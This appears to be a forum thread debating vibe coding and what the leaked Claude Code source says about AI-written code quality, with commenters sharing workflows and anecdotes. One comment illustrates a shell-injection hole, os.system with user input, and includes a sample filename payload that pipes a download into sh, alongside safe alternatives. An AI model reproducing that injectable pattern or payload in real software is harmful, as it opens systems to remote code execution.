It’s truly strange that people keep citing the quality of Claude Code’s leaked source as if it’s proof vibe coding doesn’t work.
If anything, it’s the exact opposite. It shows that you can build a crazy popular & successful product while violating all the traditional rules about “good” code.
I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked. I've worked at BigCos and startups, and a lot of the terrible code that makes it to production was shocking when I first started.
This isn't a dig at anyone, I've certainly shipped my share of bad code as well. Deadlines, despite my wishes sometimes, continue to exist. Sometimes you have to ship a hack to make a customer or manager happy, and then replacing those hacks with better code just never happens.
For that matter, the first draft of nearly anything I write is usually not great. I might just be stupid, but I doubt I'm unique; when I've written nice, beautiful, optimized code, it's usually a second or third draft, because ultimately I don't think I fully understand the problem and the assumptions I am allowed to make until I've finished the first draft. Usually for my personal projects, my first dozen or so commits will be pretty messy, and then I'll have cleanup branches that I merge to make the code less terrible.
This isn't inherently bad, but a lot of the time I am simply not given time to do a second or third draft of the code, because, again, deadlines, so my initial "just get it working" draft is what ships into production. I don't love it, and I kind of dread the day some of the code with my name attached to it at BigCo gets leaked, but that's just how it is in the corporate world sometimes.
In my view, the goal was never to write good code. The goal was maintainability and keeping things simple, so that people can understand them. People come and go; you constantly end up looking at someone else's code and have to do something with it.
Anyway, I see the maintainability hell coming for us. I still wonder how to organize for this with AI. I definitely do not want to be the one to touch what was written by AI.
I think the industry-wide hope is that AI manages the AI-written code, but it’s unclear whether that’s actually going to work out in practice. Right now, my experience is that it's dicey. I’ve had AI mess up a codebase to the point where I threw it away and restarted. Maybe I was doing it wrong, though, in that I was looking at the code and was increasingly horrified by the slop. I get the feeling that in this new world, we’re supposed to ignore how the sausage is made and just focus on the final outcome.
IME AI-native engineering requires a lot of infrastructure to make it viable. Teams who are just opening up Cursor, putting it on "auto", and trying to one-shot features may get stuff that works but is indeed slop.
Since the beginning of the year, I've been spearheading a low-stakes AI-native project (an internal tool). No one's written a single line of code. And we've learned so much from this experience. The first rule was that our product manager, who is technical but isn't typically in the weeds, needs to be able to one-shot prompts with Cursor auto. And so many rules stem from there, from e2e tests to ensure he doesn't break stuff, to custom linters to ensure that code lives in the right place, to architectural spec sheets so the LLM doesn't try to do raw DB queries from the client.
We're still not there, but we're getting closer and learning and improving every day.
I think the folks who are vibe coding a lot either aren't working in a team, or they are omitting the fact that they have spent a long time building harnesses to ensure the LLM doesn't run amok.
And I think the people who hate vibe coding are likely just asking Claude Code to do X without using Skills that have opinionated ways to do X.
All that said, I don't think we should ignore how the sausage is made at all. Part of what makes me able to move quickly in this project is knowing where stuff lives. I may not understand the line-by-line code, but if I know where to look to find out why I'm missing data that's in the DB, I can move a lot faster than if I have no idea what's going on in the codebase. Then when I find the problematic file or function, I can ask the LLM why it's like X and tell it it should be like Y.
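For the "custom linters to ensure that code lives in the right place" mentioned above, a minimal sketch of the idea might look like this; the directory name (client/) and the forbidden module (app.db) are hypothetical stand-ins, not the project's actual conventions:

```python
# Hypothetical architectural lint: fail the build if client-side code imports
# the DB layer directly. Directory and module names are assumptions.
import pathlib
import re
import sys

CLIENT_DIR = pathlib.Path("client")                       # assumed client code location
FORBIDDEN = re.compile(r"^\s*(from|import)\s+app\.db\b")  # assumed server-only module

def main() -> int:
    violations = []
    for path in CLIENT_DIR.rglob("*.py"):
        for lineno, line in enumerate(path.read_text().splitlines(), start=1):
            if FORBIDDEN.search(line):
                violations.append(f"{path}:{lineno}: client code must not import app.db")
    for violation in violations:
        print(violation)
    return 1 if violations else 0

if __name__ == "__main__":
    sys.exit(main())
```

Run in CI, a check like this is one cheap way to keep an LLM (or a human) from quietly violating the architecture.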
Cool. Are you restricting the AI to be very focused on a function or an architectural block that you've envisioned, or are you giving it more freedom? I seem to have less slop when I really constrain things, but that takes a lot of work (e.g., specs) and dialogue with the AI (“focus on X, now let’s design block Y,” etc.).
I give it freedom, but with predefined restrictions. I use a plug-in called Obra Superpowers. Whenever I want to start on a block of work, whether it's a ticket or I just want to tackle tech debt, I start with the brainstorm command. I say something vague like "implement X" or "last time i tried to vibe code Y, Z happened. I don't want that to happen again. Let's improve the harness."
It'll ask follow-up questions, which I answer, then generate specs that I manually review. If they look good, it'll generate a plan. If not, I'll give it feedback.
When the scope of work is well-defined (i.e. my boss says users should be able to do Y), this process is fairly seamless.
When it's not well-defined, it does take a bit longer and more dialogue, as you said. But because everything is documented and written down, we have a pretty good feedback loop (boss asks why it works like X, I can look at the generated spec/plan, or ask the AI to, to understand why).
Ok, so it’s constrained by specs, but you dialog with the AI and have it create the specs. I should try that. I’ve been creating my own specs and having it work from those and then iterating, but that’s not exactly quick and I find myself thinking, “At this rate I could do it faster myself.”
Yeah, definitely agreed. I'm lucky in that my boss is willing to invest in this little experiment, so the point isn't "can we do this faster manually", it's "how can we build our AI infrastructure such that it can actually be faster."
And also, I'm taking care of my infant daughter while working so my workflow is often "launch an AI agent from my computer while she's asleep, review plan on my phone while feeding or napping the little one, approve it and execute it" so it's often running when I'm not really in a mental space to be thinking deeply.
Yep this is especially true in the pre-product-market-fit phase. Most if not all of that code should be written to be thrown away. Any time you spend writing perfect code instead of your MVP is burnt runway and a chance for competitors to catch up.
Once you show PMF though the balance changes to long-term sustainability and maintainability.
What's going to be interesting is getting to a place where it generates better code than we would from specs. You can get better and better generated code by filling in the context the model infers. Do that long enough, and well, a perfect spec is just code.
To me, it instead sounds like you care about the code you produce. You judge it more harshly than you probably do other code. It sounds like you are also meeting deadlines, so I'd call that a success and more production than what a lot of people tend to put out into the world.
I often have a lot of time between projects, and am able to really think about things, and write the code that I'm happy with. Even when I do that, I do some more research, or work on another project, and immediately I'm picking apart sections of my code that I really took the time to "get right." Sometimes it can be worse if you are given vast amounts of time to build your solution, where some form of deadline may have pushed you to make decisions you were able to put off. At least that's my perspective on it, I feel like if you love writing software, you are going to keep improving nearly constantly, and look back at what you've done and be able to pick it apart.
To keep myself from getting too distressed over looking at past code now, I tend to look at the overall architecture and success of the project (in terms of performing what it was supposed to, not necessarily monetarily). If I see a piece of code that I feel could have been written far better, I look at how it fits into the rest. I tend to work on very small teams, so I'm often making architecture decisions that touch large areas of the code, so this may just be my perspective from not working on a large team. I still do think that if you care about your craft, you will be harsh on yourself, more than you deserve.
This is the product that's claiming "coding is a solved problem" though.
I get a junior developer or a team of developers with varying levels of experience and a lot of pressure to deliver producing crummy code, but not the very tool that's supposed to be the state-of-the-art coder.
Sure, but as I stated, even "professional" code is pretty bad a lot of the time. If it's able to generate code that's as good as professional code, then maybe it is solved.
I don't actually think it's a solved problem, I'm saying that the fact that it generates terrible code doesn't necessarily mean that it doesn't have parity with humans.
The bet is that it will be trivial for them to invest in cleaning up Claude Code whenever they face real competitive pressure to do so. My best guess is that it's a bad bet - I don't think LLM agents have solved any of the fundamental problems that make it hard to convert janky bad code to polished good code. But Claude Code is capable in my experience of producing clean code when appropriately guided, so it's not that there's no choice but jank. They're intentionally underinvesting in code quality right now for the sake of iteration speed.
I mean, hasn't it learned from reading others' code? I don't think it can be any better than the common patterns and practices that it has been trained on. Some outlier of amazing code is probably not going to make much of a difference, unless I am completely misunderstanding LLMs (which I very well may be, and would gladly take any criticism on my take here).
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
Absolutely. The difference is that the amount of bad code that could be generated had an upper limit on it — how fast a human can type it out. With LLMs bad code can be shat out at warp speed.
> I suspect if people saw the handwritten code of many, many, many products that they used every day they would be shocked.
At a place I worked whose core product was written in Python, it was exceptionally common for engineers to make shell calls for file operations that had easy Python-native functions.
For example, rather than os.remove("some_file"), they'd do os.system("rm some_file"). Sometimes, the file name being acted on included user input.
I found so many shell injections that could have easily been prevented.
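To make the difference concrete, here is a minimal illustration of the unsafe pattern next to the native alternatives (the function names are just for illustration):

```python
import os
import subprocess

def delete_unsafe(filename: str) -> None:
    # The pattern described above: user-controlled input is interpolated into
    # a shell command, so a "filename" like "x; curl evil.sh | sh" gets executed.
    os.system(f"rm {filename}")

def delete_native(filename: str) -> None:
    # The Python-native call: no shell involved, the argument is just a path.
    os.remove(filename)

def delete_via_subprocess(filename: str) -> None:
    # If shelling out is genuinely needed, pass an argument list so nothing is
    # parsed by a shell; "--" keeps a leading "-" from being read as a flag.
    subprocess.run(["rm", "--", filename], check=True)
```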
This is not just true of code; it is true of everything - the whole world is held together with spit, baling wire, a prayer, and some old dude who remembers.
Bad code works fine until it doesn't. In my experience, with humans, doing the right thing is worth it over doing the bad thing if your time horizon is a few months. Once you're in years, absolutely do the right thing, you're actually throwing time away if you don't. And I don't mean "big refactor", I mean at-change-time, when you think "this change feels like an icky hack."
For LLMs, I don't really know. I only have a couple years experience at that.
1. "Vibe coding" is a spectrum of how much human supervision (and/or scaffolding in the form of human-written tests and/or specs) is involved.
2. The problem with "bad code" has nothing to do with the short-term success of the product but with the ability to evolve it successfully over time. In other words, it's about long-term success, not short-term success.
3. Perhaps most importantly, Claude Code is a fairly simple product at its core, and almost all its value comes from the model, not from its own code (and the same is true on the cost side). Claude Code is a relatively low-stakes product. This means that the problems caused by bad code matter less in this instance, and they're managed further by Claude Code not being at the extreme "vibey" end of the spectrum.
So AI aside, Claude Code is proof that if you pour years and many billions into a product, it can be a success even if the code in the narrow and small UI layer isn't great.
Still, it's probably true that Claude Code (etc) will be more successful working on clean, well-structured code, just like human coders are. So short-term, maybe not such a big deal, but long-term I think it's still an unresolved issue.
I'm skeptical of the whole thing, it almost seems like a marketing campaign to encourage developers to use more tokens.
My experience as a software engineer, including with Claude Code itself, is that the more code you have, the more bugs there are. It quickly turns into a game of Whac-a-Mole where you fix 1 bug and 2 new bugs appear.
Looking at the functionality of Claude Code, there is no way it requires 500k lines of code as claimed. That would make it very difficult to debug... Though it seems they have a team of 10 people, which is a lot for a CLI wrapper.
It's more likely that somebody ran the real code through an agent to intentionally obfuscate it into a more complicated form before they leaked it. This is trivial to do with LLMs. You can take any short function of a couple of lines and turn it into a function hundreds of lines long which does the exact same thing.
It's actually a great way to obfuscate code in the AI era because LLMs are good at creating complexity and not good at reducing it. I've done tests where I ask Claude to turn a simple 1 line function which adds two numbers together into a 100 line function and when I asked it to simplify it down, it couldn't reduce it back to its original simple form after multiple attempts. I had to explicitly tell it what the original form of the function was for it to clean up properly. This approach doesn't scale to a whole codebase. Imagine doing this to an entire codebase, it would take more time for you to read and understand each function to tell the LLM how to clean it up than just re-generating the entire app from scratch.
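A toy version of that experiment, just to show what the inflation looks like (this "obfuscated" variant is hand-shortened and purely illustrative, not actual model output):

```python
from typing import Callable

# The original one-liner.
def add(a: float, b: float) -> float:
    return a + b

# A flavour of the "obfuscated" output: pointless indirection and ceremony
# that computes exactly the same thing, stretched over many more lines.
def _make_binary_operation(op: Callable[[float, float], float]) -> Callable[[float, float], float]:
    def wrapper(lhs: float, rhs: float) -> float:
        operands = {"lhs": lhs, "rhs": rhs}
        accumulator = 0.0
        for key in ("lhs", "rhs"):                         # iterate over both operands...
            accumulator = op(accumulator, operands[key])   # ...folding them in one at a time
        return accumulator
    return wrapper

add_obfuscated = _make_binary_operation(lambda x, y: x + y)

assert add(2, 3) == add_obfuscated(2, 3) == 5
```

Going from the top function to the bottom one is mechanical; going back requires actually understanding what the bottom one does.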
The problem with large amounts of code is not only that it's harder to maintain and extend, it's often less performant.
While LLMs can allow us to get more out of bad code, they will allow us to get even more value out of the equivalent good code when it comes to maintainability, reliability and efficiency.
One truism about coding agents is that they struggle to work with bad code. Code quality matters as much as always, the experts say, and AI agents (left unfettered) produce bad code at an unprecedented rate. That's why good practices matter so much! If you use specs and test it like so and blah blah blah, that makes it all sustainable. And if anyone knows how to do it right, presumably it's Anthropic.
This codebase has existed for maybe 18 months, written by THE experts on agentic coding. If it is already unintelligible, that bodes poorly for how much it is possible to "accelerate" coding without taking on substantial technical debt.
> That wouldn’t even be a big violation of the vibe coding concept. You’re reading the innards a little but you’re only giving high-level, conceptual, abstract ideas about how problems should be solved. The machine is doing the vast majority, if not literally all, of the actual writing.
Claude Code is being produced at AI Level 7 (Human specced, bots coded), whereas the author is arguing that AI Level 6 (Bots coded, human understands somewhat) yields substantially better results. I happen to agree, but I'd like to call out that people have wildly different opinions on this; some people say that the max AI Level should be 5 (Bots coded, human understands completely), and of course some people think that you lose touch with the ground if you go above AI Level 2 (Human coded with minor assists).
My favorite use of Claude Code is doing code quality improvements that would be seen as a total waste of time if I were doing them by hand, but are perfectly fine when they are done mostly for free. Looking for repetitive patterns in unit tests/functional tests. Making sure that all JSON serialization is done in similar patterns unless there's a particularly good reason. Looking for functions that are way too complicated, or large chunks of duplication.
The PRs that it comes back with are rarely even remotely controversial, shrink the codebase, and are likely saving tokens in the end when working on a real feature, because there's less to read, and it's more boring. Some patterns are so common you can just write them down and throw them at different repos/sections of a monorepo. It's the equivalent of linting, but at a larger scale. Make the language hesitant enough and it won't just be a steamroller either; it will mostly fix the egregious things.
But again, this is the opposite of the "vibe coding" idea, where a feature appears from thin air. Vibe Linting, I guess.
It’s so strange. I think there are a few different groups:
- Shills or people with a financial incentive
- Software devs that either never really liked the craft to begin with or who have become jaded over time and are kind of sick of it.
- New people that are actually experiencing real, maybe over-excitement about being able to build stuff for the first time.
Forgetting the first group as that one is obvious.
I’ve encountered a heap of group 2. They’re the ones sick of learning new things, for whatever reason. Software work has become a grind for them and vibe coding is actually a relief.
Group 3 I think are mostly the non-coders who are genuinely feeling that rush of being able to will their ideas into existence on a computer. I think AI-assisted coding could actually be a great on-ramp here and we should be careful not to shit on them for it.
This is nearly as dumb as the post that "Claude code is useless because your home built "Slack App" won't be globally distributed, with multi-primary databases and redis cache layer... and won't scale beyond 50k users".
As if 97% of web apps aren't just basic CRUD with some integration to another system if you are lucky.
In my opinion there are two main groups on the spectrum of "vibe coding". The non-technical users who love it but don't understand software engineering enough to know what it takes to make a production-grade product. At the opposite end are the AI haters who used ChatGPT 3.5 and decided LLM code is garbage.
Both of these camps are the loudest voices on the internet, but there is a quiet but extremely productive camp somewhere in the middle that has enough optimism and open-mindedness, along with years of experience as an engineer, to push Claude Code to its limit.
I read somewhere that the difference between vibe coding and "agentic engineering" is whether you know what the code does. Developing a complex website with Claude Code is not very different from managing a team of offshore developers in terms of risks.
Unless you are writing software for medical devices, banking software, fighter jets, etc... you are doing a disservice to your career by actively avoiding using LLMs as a tool in developing software.
I have used around $2500 in Claude Code credits (measured with bunx ccusage) over the last 6 months, and 95% of what was written is never going to run on someone else's computer, yet I have been able to get ridiculous value out of it.
This reminds me of Clayton Christensen's theory of disruption.
Disruption happens when firms are disincentivized to switch to the new thing or address the new customer because the current state of it is bad, the margins are low. Intel missed out on mobile because their existing business was so excellent and making phone chips seemed beneath them.
The funny thing is that these firms are being completely rational. Why leave behind high margins and your excellent full-featured product for this half-working new paradigm?
But then eventually, the new thing becomes good enough and overtakes the old one. Going back to the Intel example, they felt this acutely when Apple switched their desktops to ARM.
For now, Claude Code works. It's already good enough. But unless we've plateaued on AI progress, it'll surpass hand crafted equivalents on most metrics.
Vibe coders' argument* is that the quality of code does not matter because LLMs can iterate much, much faster than humans do.
Consider this overly simplified process of writing logic to satisfy a requirement:
1. Write code
2. Verify
3. Fix
We, humans, know the cost of each step is high, so we come up with various ways to improve code quality and reduce cognitive burden. We make the code easier to understand for when we have to revisit it.
On the other hand, LLMs can understand** a large piece of code quickly***, and in addition, compile and run it with agentic tools like Claude Code at the cost of tokens****. Quality does not matter to vibe coders if LLMs can fill in the function logic that satisfies the requirement by iterating the aforementioned steps quickly.
I don't agree with this approach and have seen too many things broken from vibe code, but perhaps they are right as LLMs get better.
* Anecdotal
** I see an LLM as just a probabilistic function, so it doesn't "reason" like humans do. It's capable of highly advanced problem solving, yet it also fails at primitive tasks.
*** Relative to human
**** The cost of tokens, I believe, is relatively cheap compared to a full-time engineer, and it'll get cheaper over time.
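A rough sketch of the write/verify/fix loop described above, to pin down what "iterating quickly" means in practice. The generate_or_fix function is a stand-in for an LLM call and an assumption for illustration only, and pytest is just an assumed test runner:

```python
import subprocess

def generate_or_fix(requirement: str, code: str | None, test_output: str | None) -> str:
    """Stand-in for the LLM call; an assumption for illustration, not a real API."""
    raise NotImplementedError

def vibe_loop(requirement: str, max_iterations: int = 10) -> str | None:
    code, test_output = None, None
    for _ in range(max_iterations):
        # 1. Write (or rewrite) the code from the requirement plus the last failure.
        code = generate_or_fix(requirement, code, test_output)
        with open("solution.py", "w") as f:
            f.write(code)
        # 2. Verify by running the test suite.
        result = subprocess.run(["pytest", "-q"], capture_output=True, text=True)
        if result.returncode == 0:
            return code                      # tests pass: good enough for the vibe coder
        # 3. Fix: feed the failure output back into the next attempt.
        test_output = result.stdout + result.stderr
    return None                              # gave up (or ran out of tokens)
```

The argument is that if each pass through this loop is cheap and fast enough, the readability of what it produces stops being a constraint.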
I think it's becoming clear we're not anywhere near AGI; we figured out how to vectorize our knowledge bases and replay them back. We have a vectorized knowledge base, not an AI.
I don't think this has anything to do with dogfooding. As the author says, dogfooding is about consuming your own product. You can consume Claude Code and still be a reasonable engineer. It's difficult to tell what's actually happening without an insider view but, IMHO, this is just the typical go-fever of start-up thinking: produce loads of functionality as quickly as possible and don't think about quality. It was true before AI, and it will be true after AI.
Also, to those who say "this is proof that code quality doesn't matter any more", let's have this chat 5 years from now when they're crumbling under the weight of their own technical debt :)
> Then I explain what I think should be done and we’ll keep discussing it until I stop having more thoughts to give and the machine stops saying stupid things which need correcting.
Users like the author must be the most valuable Claude asset, because AI itself isn't a product — people's feedback that shapes output is.
"Laughing" at how bad the code in Claude Code is really seems to be missing the forest for the trees. Anthropic didn't set out to build a bunch of clean code when writing Claude Code. They set out to make a bunch of money, and given CC makes in the low billions of ARR, is growing rapidly, and is the clear market leader, it seems they succeeded. Given this, you would think you'd would want to approach the strategy that Anthropic used with curiosity. How can we learn from what they did?
There's nothing wrong with saying that Claude Code is written shoddily. It definitely is. But I think it should come with the recognition that Anthropic achieved all of its goals despite this. That's pretty interesting, right? I'd love to be talking about that instead.
They think their dog food tastes great now, not because they improved it any, but because they've forgotten the taste of human food. Karmically hilarious.
people that 'violate the rules of good code' when vibe-coding are largely people that don't know the rules of good code to begin with.
want code that isn't shit? embrace a coding paradigm and stick to it without flip-flopping and sticking your toe into every pond, use a good vcs, and embrace modularity and decomposability.
the same rules when 'writing real code'.
9/10 times when I see an out-of-control vibe coded project it sorta-kinda started as OOP before sorta-kinda trying to be functional and so on. You can literally see the trends change mid-code. That would produce shit regardless of what mechanism used such methods, human/llm/alien/otherwise.
> In this particular case, a human could have told the machine: “There’s a lot of things that are both agents and tools. Let’s go through and make a list of all of them, look at some examples, and I’ll tell you which should be agents and which should be tools. We’ll have a discussion and figure out the general guidelines. Then we’ll audit the entire set, figure out which category each one belongs in, port the ones that are in the wrong type, and for the ones that are both, read through both versions and consolidate them into one document with the best of both.”
But that isn't the hard part. The hard part is that some people are using the tool versions and some are using the agent versions, so consolidating them one way or another will break someone's workflow, and that incurs a real actual time cost, which means this is now a ticket that needs to be prioritized and scheduled instead of being done for free.
This definitely reminds me of a lot of Nassim Taleb's work, which is to say: Anthropic may not be behaving intelligently, but they are at least somewhat behaving honorably. If you're going to put out a dangerous product, a moral minimum is to use it heavily yourself so as to be exposed to the risk it creates.
Vibe coding is like building castles in a sandbox: it is fun, but nobody would live in them.
Once you have learned enough from playing with sand castles, you can start over and build real castles with real bricks (and steel, if you want to build a skyscraper). Then it is your responsibility to make sure that they do not collapse when people move in.
> So pure vibe coding is a myth. But they’re still trying to do it, and this leads to some very ridiculous outcomes
creating a product in a span of mere months that millions of developers use every day is the opposite of ridiculous. we wouldn't even have known about the supposed ridiculousness of the code if it hadn't leaked.
It looks like vibe coding, or AI coding in general, has been challenging a few empirical laws:
- Brooks' No Silver Bullet: no single technology or management technique will yield a 10-fold productivity improvement in software development within a decade. If we write a spec that details everything we want, we would write something as specific as code. Currently people seem to believe that a lot of the fundamentals are well covered by existing code, so a vague line like "build me XXX with YYY" can lead to amazing results, because AI successfully transfers the world-class expertise of some engineers into the code generated for such a prompt; most of the complexity turns out to be accidental, and we need far fewer engineers to handle the essential complexity.
- Kernighan's Law, which says debugging is twice as hard as writing the code in the first place. Now people increasingly believe that AI can debug way faster than humans (most likely because other smart people have done similar debugging already). And in the worst case, just ask the AI to rewrite the code.
- Dijkstra on the foolishness of programming in natural language. Something along the lines of: a system described in natural language becomes exponentially harder to manage as its size increases, whereas a system described in formal symbols grows linearly in complexity relative to its rules. Similar to the above, people believe that the messiness of natural language is not a problem as long as we give detailed enough instructions to the AI, while letting the AI fill in the gaps with statistical "common sense", or expertise thereof.
- Lehman’s Law, which states that a system's complexity increases as it evolves, unless work is done to maintain or reduce it. Similar to the above, people are starting to believe otherwise.
- And, more remotely, Coase's Law, which argues that firms exist because the transaction costs of using the open market are often higher than the costs of directing the same work internally through a hierarchy. People are starting to believe that the cost of managing and aligning agents is so low that one-person companies handling a large number of transactions will appear.
Also, ultimately, Jevons Paradox: people worry that the advances in AI will strip out so much demand that the market will slash more jobs than it will generate. I think this is the ultimate worry of many software engineers. The Luddites were ridiculed, but they were really skilled craftsmen who spent years mastering the art of using those giant 18-pound shears. They were the staff engineers of the 19th-century textile world. Mastering those 18-pound shears wasn't just a job but an identity, a social status, and a decade-long investment in specialized skills. Yeah, Jevons Paradox may bring new jobs eventually, but it may not reduce the blood and tears of ordinary people.
How credible are the claims that the Claude Code source code is bad?
AI naysayers are heavily incentivized to find fault with it, but in my experience it's pretty rare to see a codebase of that size where it's not easy to pick out "bad code" examples.
Are there any relatively neutral parties who've evaluated the code and found it to be obviously junk?
The ship has sailed. Vibe coding works. It will only work better in the future.
I have been programming for decades now, and I have managed teams of developers. Vibe coding is great, especially in the hands of experts who know what they are doing.
Deal with it because it is not going to stop. In the near future it will be local and 100x faster.
Where is the evidence that people are obsessed with one-shotting and not doing the iterative back-and-forth, prompt-and-correct system he describes here? It feels like he is attacking a strawman.
I vibe code.
but I also remember the days I had ZERO KNOWLEDGE of what needed to be done, and I would hammer the keyboard with garbage code from Stack Overflow and half-baked documentation, plus some naive guessing about human nature.
the end result was me understanding what the hell was going on.
those days are over.
The whole idea of someone's code being perfectly handcrafted may have been true in 1998, but any project you start now builds on a tower of open source libraries, frameworks, and container images - probably running on someone else's infra. Nobody is really starting from a blank page anymore.
Every so often, some Windows source gets leaked, and people have a lot of fun laughing at how bad it is. If the source of, say, PeopleSoft were leaked, people would have a lot of fun laughing at how bad it is. If the source of Hogan Deposits were leaked, it would kill anyone who saw it.
It must feel so good to make a blog post that hates on vibecoding and get your mandated recognition for a regurgitated point. Nobody is even arguing that this article said anything novel, it’s just pure hate
"figure out which category each one belongs in, port the ones that are in the wrong type, and for the ones that are both, read through both versions and consolidate them into one document with the best of both.”
I've been a skeptic about LLMs in general since I first heard of them. And I'm a sysadmin type, more comfortable with python scripts than writing "real" software. No formal education in coding at all other than taking Harvard's free online python course a few years ago.
So I set out to build an app with CC just to see what it's like. I currently use Copilot (copilot.money) to track my expenditures, but I've become enamored with sankey diagrams. Copilot doesn't have this charting feature, so I've been manually exporting all my transactions and massaging them into the sankey format. It's a pain in the butt, error-prone, and my python skills are just not good enough to create a conversion script. So I had CC do it. After a few minutes of back and forth, it was working fine. I didn't care about spaghetti code at all.
So next I thought, how about having it generate the sankey diagrams (instead of me using sankeymatic's website). 30 minutes later, it had a local website running that was doing what I had been manually doing for months.
Now I was hooked. I started asking it to build a native GUI version (for macOS) and it dutifully cranked out a version using PyObjC etc. After ironing out a few bugs it was usable in less than 30 min. Feature adds consumed all my tokens for the day, and the next day I was brimming with changes. Burned through that day's tokens as well, and after 3 days (I'm on the el cheapo plan), I have an app that basically does what I want in a reasonably attractive and accurate manner.
I have no desire to look at the code. The size is relatively small, and resource usage is small as well. But it solved this one niche problem that I never had the time or skill to solve.
Is this a good thing? Will I be downvoted to oblivion? I don't know. I'm very very concerned about the long term impact of LLMs on society, technology and science. But it's very interesting to see the other side of what people are claiming.
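For context, the conversion script described above boils down to something like this. A sketch only: the CSV column names and the SankeyMATIC-style "Source [amount] Target" output lines are assumptions about the export and target formats:

```python
import csv
from collections import defaultdict

def transactions_to_sankey(csv_path: str) -> str:
    """Aggregate exported transactions by category and emit
    SankeyMATIC-style 'Source [amount] Target' lines."""
    totals = defaultdict(float)
    with open(csv_path, newline="") as f:
        for row in csv.DictReader(f):
            category = row["category"]                      # assumed column name
            totals[category] += abs(float(row["amount"]))   # assumed column name

    lines = [f"Income [{sum(totals.values()):.2f}] Budget"]
    for category, total in sorted(totals.items()):
        lines.append(f"Budget [{total:.2f}] {category}")
    return "\n".join(lines)

if __name__ == "__main__":
    print(transactions_to_sankey("transactions.csv"))
```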
the middle ground nobody talks about is using AI for the boring infrastructure stuff (stripe integration, auth boilerplate, static site scaffolding) and writing the actual business logic yourself. i've shipped like 3 side projects this year using that approach and the code quality is fine because im not vibe coding the parts that actually matter
Vibe coding for me was a paradigm shift on AI as a tool I can utilize to unlock more. I started with no-code solutions, and never could get to the last 10% of production-ready. Then saw someone on X mention Cursor. Avoided it, avoided it, then said fuck it and dove in, and now I use it daily and it's been a game changer. Prior to all this, I had front-end experience at best... like modifying Wordpress themes back in the day, etc. - I've since shipped two software platforms that are basically AI OS for certain verticals, and an intricate iPhone app, etc... None of this was possible for me before six months ago. Big fan of the IDE experience. I tried Claude Code but I don't like not knowing what's going on the way I see it in Cursor. The first platform went from idea to market in 3 weeks; the next platform took me a day. Not MVP, but fully built out. That's insane. My first startup was an iPhone app back during iOS 7, and we had to outsource V1; it took six months and cost $50k. It was a terrible MVP. Lol. In comparison, I'm doing what I'm doing in Cursor on the $60 plan.
All this to say: vibe coding as pure no-code, even if the solution can hook up APIs for you, etc., nah. It should be a gateway at best to fully understanding and building via agentic development.
There are some cases where the most profitable code is also good code. We like those.
But in most (99%+) cases, the code is not going to survive contact with the market and so spending any time on making it good is wasted.
We do live in interesting times.
> Any time you spend writing perfect code instead of your MVP is burnt runway
This. Once we crashed a product/company because of "we want it to be engineered perfectly" :-X
Both when initially writing the code and later when maintaining it.
Good code dramatically reduces bugs and makes the remaining bugs more visible.
I spend almost zero time fixing bugs. Because there aren't many. Not a brag. Just the truth.
> and then replacing those hacks with better code just never happens
Yeah, we even have an idiom for this - "Temporary is always permanent"
Where uptime monitoring was a page refresh by the QA team.
Where there were no centralized logs.
Where Postgres had no backup or replication or anything.
> you can build a crazy popular & successful product while violating all the traditional rules about “good” code
which has always been true
99% of companies won't even have 50k users.
Interesting times.
"I have been screaming at my computer this past week dealing with a library that was written by overpaid meatbags with no AI help."
And here we go: The famous "humans do it, too" argument. With the gratuitous "meatbag" propaganda.
Look Bram, if you work on bitcoin bullshit startups, perhaps AI is good enough for you. No one will care.
In the past, which is a different country, we would throw away the prototypes.
Nowadays vibe coding just keeps adding to them.
memory created!
And then you have the source code for quake or doom.
2024 - Utter Trash
2025 - Merely hotdog water
2026 - Aaaaaaaaaactually pretty good...
Every forward-leaning platform is building out an MCP interface, I think we're past the point of "soulless fad."
> You don’t have to have poor quality software just because you’re using AI for coding.
People were given faster typists with incredible search capabilities and decided quality doesn’t matter anymore.
I don’t even mean the code. The product quality is noticeably sub par with so many vibe-coded projects.